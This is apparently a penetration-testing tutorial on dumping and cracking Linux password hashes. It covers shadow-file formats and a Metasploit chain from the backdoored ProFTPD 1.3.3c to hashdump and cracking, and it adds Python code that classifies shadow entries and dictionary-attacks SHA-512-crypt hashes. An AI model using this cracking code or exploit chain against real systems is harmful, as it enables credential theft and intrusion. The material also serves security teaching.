Dumping Hashes
Linux is a multi-user system: many accounts can be logged in and running processes at the same time. Each of those accounts is a credential that can be guessed, phished or cracked, so more accounts mean more potential entry points for an attacker, and the files that back those accounts are a natural target once you have a foothold on the box.
Basic account details (username, UID, GID, GECOS comment, home directory and login shell) are stored in the passwd file, located at:
/etc/passwd
This file does not hold passwords. It has to be readable by every user, because anything that maps a UID to a name reads it, so its password field contains only an x. The password hashes (produced by a salted, iterated one-way function, not encrypted) are kept with the password-ageing fields in the shadow file, located at:
/etc/shadow
The shadow file is readable only by root. On Debian-derived systems it is mode 0640 and group-readable by the shadow group, so setgid helpers such as unix_chkpwd can verify passwords without full root; Red Hat-derived systems use mode 0000, which root alone bypasses. That restriction keeps the hashes out of reach of ordinary users, and it has a practical consequence for an attacker: being able to read /etc/shadow is itself proof of root-level access, and once the file is in hand the remaining work, cracking, happens offline where the target cannot see or rate-limit it.
The Hashes
The second field of each shadow entry holds the password hash, and the hash itself announces which algorithm produced it. That is worth checking before anything else, because the algorithm and its cost parameter decide how expensive cracking will be and which mode to hand to John the Ripper or hashcat.
Hashes use the crypt(3) modular format $id$salt$hash (the SHA-crypt schemes may insert rounds=N$ after the id; bcrypt inserts its cost there). The identifier between the first two dollar signs names the algorithm. For example:
$1$ → MD5-crypt
$2a$ → bcrypt (Blowfish-based; $2b$ and $2y$ are later revisions of the same scheme)
$5$ → SHA-256-crypt
$6$ → SHA-512-crypt
$y$ → yescrypt (not in the original table, but the default on current Debian, Ubuntu and Fedora releases)
Recognising the identifier tells you what you are up against: MD5-crypt is fast to attack, SHA-256/512-crypt default to 5000 rounds unless rounds=N says otherwise, and bcrypt and yescrypt are deliberately expensive. A field that starts with ! is a locked account (passwd -l only prepends the !, so the hash underneath is still crackable), * means the account has no password login at all, and an empty field means no password is set.
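As an added example (not part of the original post), the parser below reads shadow-format lines, works out from the $id$ prefix which scheme protects each account, extracts the cost parameter where the scheme has one, and flags locked, passwordless and no-login accounts. The sample entries are constructed for the example with placeholder salts and hashes; they are not from any real host.

```python
import re

# crypt(3) scheme identifiers as they appear between the first two '$' of the field
CRYPT_SCHEMES = {
    "1": "MD5-crypt",
    "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
    "5": "SHA-256-crypt",
    "6": "SHA-512-crypt",
    "7": "scrypt",
    "y": "yescrypt",
}


def classify_shadow_entry(line):
    """Return a dict describing the password field of one /etc/shadow line."""
    fields = line.rstrip("\n").split(":")
    if len(fields) < 2:
        raise ValueError("not a shadow entry: %r" % line)
    user, field = fields[0], fields[1]
    locked = field.startswith("!")
    body = field.lstrip("!")           # passwd -l only prepends '!'; the hash underneath survives
    entry = {"user": user, "locked": locked, "scheme": None, "cost": None, "crackable": False}
    if body == "":
        entry["status"] = "no password set" if locked else "EMPTY PASSWORD"
        return entry
    if body == "*":
        entry["status"] = "no password login"
        return entry
    entry["status"] = "hash present"
    m = re.match(r"^\$([^$]+)\$(?:rounds=(\d+)\$)?", body)
    if m is None:
        # no '$' prefix: a 13-character field is traditional DES crypt (2-char salt + 11-char hash)
        entry["scheme"] = "DES-crypt" if len(body) == 13 else "unrecognised"
        entry["crackable"] = entry["scheme"] == "DES-crypt"
        return entry
    ident, rounds = m.group(1), m.group(2)
    entry["scheme"] = CRYPT_SCHEMES.get(ident, "unrecognised ($%s$)" % ident)
    if ident in ("5", "6"):
        entry["cost"] = int(rounds) if rounds else 5000   # glibc default when rounds= is absent
    elif ident.startswith("2"):
        entry["cost"] = int(body.split("$")[2])           # bcrypt cost factor: 2**cost iterations
    entry["crackable"] = ident in CRYPT_SCHEMES
    return entry


def audit_shadow(text):
    """Classify every non-blank line of a shadow file and return the entries."""
    return [classify_shadow_entry(l) for l in text.splitlines() if l.strip()]


# Constructed sample with placeholder salts and hashes, not copied from a real system.
SAMPLE_SHADOW = """\
root:$6$rounds=100000$saltsaltsaltsalt$PLACEHOLDERHASH:19000:0:99999:7:::
alice:$6$saltstring$PLACEHOLDERHASH:19000:0:99999:7:::
bob:!$1$saltsalt$PLACEHOLDERHASH:19000:0:99999:7:::
carol:$y$j9T$saltsaltsaltsalt$PLACEHOLDERHASH:19000:0:99999:7:::
dave:$2b$12$saltsaltsaltsaltsaltsaPLACEHOLDERHASH:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
svc:!!:19000:0:99999:7:::
guest::19000:0:99999:7:::
"""

if __name__ == "__main__":
    for e in audit_shadow(SAMPLE_SHADOW):
        print("%-8s %-18s %-14s cost=%-7s locked=%-5s %s" % (
            e["user"], e["status"], e["scheme"], e["cost"], e["locked"],
            "<- worth cracking" if e["crackable"] else ""))
```

Two details the table above glosses over show up here: a locked account (bob) still carries a usable MD5-crypt hash, and root's rounds=100000 makes each guess twenty times more expensive than alice's default-cost hash.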
Demo
The demo starts with a service scan of the target to enumerate open ports and service versions and match them against known vulnerabilities. The scan reports ProFTPD 1.3.3c. That release is not exploitable because of a coding bug: the source tarball on the project's distribution server was trojaned for a few days in late 2010, and the altered build responds to a particular command on the FTP control channel by spawning a root shell. Metasploit ships a module for it (exploit/unix/ftp/proftpd_133c_backdoor); configuring it with the target and a reverse-shell payload and running it gives a shell back from the server.
The raw shell is then upgraded to a Meterpreter session, which provides a more capable post-exploitation environment (file transfer, pivoting, post modules). Reading /etc/shadow from that session succeeds, which confirms it is running as root, since nothing else can open the file. Rather than copying the file by hand, the post/linux/gather/hashdump module collects every available password hash from the session and saves the result for later use.
With the hashes collected, the last step is to crack them offline. Metasploit's auxiliary/analyze/crack_linux module (a wrapper that drives John the Ripper or hashcat against the hashes hashdump saved) is run against the SHA-512-crypt entries only. Every password it recovers is a working credential: it logs in over SSH or satisfies su and sudo without touching the exploit again, survives a patch of ProFTPD, and is likely to be reused on other hosts. The chain therefore runs from reconnaissance to full compromise and shows how one unpatched, backdoored service becomes a complete system takeover. Two caveats apply in practice: SHA-512-crypt at the default 5000 rounds is cheap enough for dictionary and rule-based attacks but not for exhaustive search of long passwords, so results depend on the wordlist; and any account whose hash has been exposed should be treated as burned even after the service itself is fixed.
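As an added example (not part of the original post, and not what the Metasploit module does internally), the block below implements SHA-512-crypt, the $6$ scheme, in pure Python following the glibc algorithm, and runs a small dictionary attack against constructed shadow entries. The entries and their hashes are generated inside the example by the same function, the wordlist is made up, and the usernames and salts are arbitrary. Real cracking is done with John the Ripper or hashcat; the point here is to show exactly what those tools compute per guess, why the rounds= parameter sets the price of each guess, and that a locked (!) account's hash is still fair game.

```python
import hashlib
import re

# crypt(3)'s own base64 alphabet (not RFC 4648), emitted least-significant 6 bits first
CRYPT_B64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode_digest(d):
    """Encode a 64-byte digest in the byte order glibc's sha512-crypt.c uses."""
    out = []
    for k in range(21):                      # 21 triples (k, k+21, k+42), rotated by k mod 3
        trip = (k, k + 21, k + 42)
        r = k % 3
        hi, mid, lo = trip[r], trip[(r + 1) % 3], trip[(r + 2) % 3]
        w = (d[hi] << 16) | (d[mid] << 8) | d[lo]
        for _ in range(4):
            out.append(CRYPT_B64[w & 0x3F]); w >>= 6
    w = d[63]                                # the last byte stands alone: 2 characters
    for _ in range(2):
        out.append(CRYPT_B64[w & 0x3F]); w >>= 6
    return "".join(out)


def sha512_crypt(password, salt, rounds=5000):
    """SHA-512-crypt as specified by Ulrich Drepper and implemented in glibc."""
    pw, s = password.encode(), salt.encode()[:16]     # salt is capped at 16 bytes
    rounds = min(max(rounds, 1000), 999999999)        # glibc clamps the round count
    digest_b = hashlib.sha512(pw + s + pw).digest()
    a = hashlib.sha512(pw + s)
    a.update(digest_b * (len(pw) // 64) + digest_b[: len(pw) % 64])
    n = len(pw)
    while n > 0:                                      # walk the bits of len(pw), LSB first
        a.update(digest_b if n & 1 else pw)
        n >>= 1
    digest_a = a.digest()
    dp = hashlib.sha512(pw * len(pw)).digest()
    p = dp * (len(pw) // 64) + dp[: len(pw) % 64]
    ds = hashlib.sha512(s * (16 + digest_a[0])).digest()
    sb = ds * (len(s) // 64) + ds[: len(s) % 64]
    c = digest_a
    for i in range(rounds):                           # this loop is the entire cost of the scheme
        h = hashlib.sha512()
        h.update(p if i & 1 else c)
        if i % 3:
            h.update(sb)
        if i % 7:
            h.update(p)
        h.update(c if i & 1 else p)
        c = h.digest()
    prefix = "$6$" + ("rounds=%d$" % rounds if rounds != 5000 else "") + s.decode()
    return prefix + "$" + _encode_digest(c)


SHA512_FIELD = re.compile(r"^\$6\$(?:rounds=(\d+)\$)?([^$]{0,16})\$([./0-9A-Za-z]{86})$")


def crack_sha512_field(field, wordlist):
    """Try each candidate against one $6$ field; return the password or None."""
    m = SHA512_FIELD.match(field)
    if m is None:
        raise ValueError("not a SHA-512-crypt field: %r" % field)
    rounds = int(m.group(1)) if m.group(1) else 5000
    salt, want = m.group(2), m.group(3)
    for cand in wordlist:
        if sha512_crypt(cand, salt, rounds).rsplit("$", 1)[1] == want:
            return cand
    return None


def crack_shadow(lines, wordlist):
    """Dictionary-attack every $6$ entry in a list of shadow lines, locked ones included."""
    found = {}
    for line in lines:
        user, field = line.split(":")[:2]
        field = field.lstrip("!")            # a locked account's hash is still crackable
        if field.startswith("$6$"):
            found[user] = crack_sha512_field(field, wordlist)
    return found


# Constructed demo data: hashes are produced here by sha512_crypt(), not taken from a real host,
# and the wordlist is invented. 'bob' is locked and uses rounds=20000 to show the cost at work.
DEMO_SHADOW = [
    "alice:" + sha512_crypt("Hello world!", "saltstring") + ":19000:0:99999:7:::",
    "bob:!" + sha512_crypt("winter2024", "Zq7xLm3Q", 20000) + ":19000:0:99999:7:::",
    "carol:" + sha512_crypt("correct horse", "Yh2Kp9Wd") + ":19000:0:99999:7:::",
]
DEMO_WORDLIST = ["password", "letmein", "Hello world!", "winter2024", "qwerty"]

if __name__ == "__main__":
    for user, pw in crack_shadow(DEMO_SHADOW, DEMO_WORDLIST).items():
        print("%-6s %s" % (user, pw if pw else "(not in wordlist)"))
```

The first assertion in the accompanying check compares the implementation with the published test vector for salt saltstring and password Hello world!, so any transcription slip in the round loop or the output permutation is caught immediately. carol's password is deliberately absent from the wordlist: a correct implementation that reports "not in wordlist" is the normal outcome of a dictionary attack, and the fix is a better wordlist or rules, not more rounds of the same one.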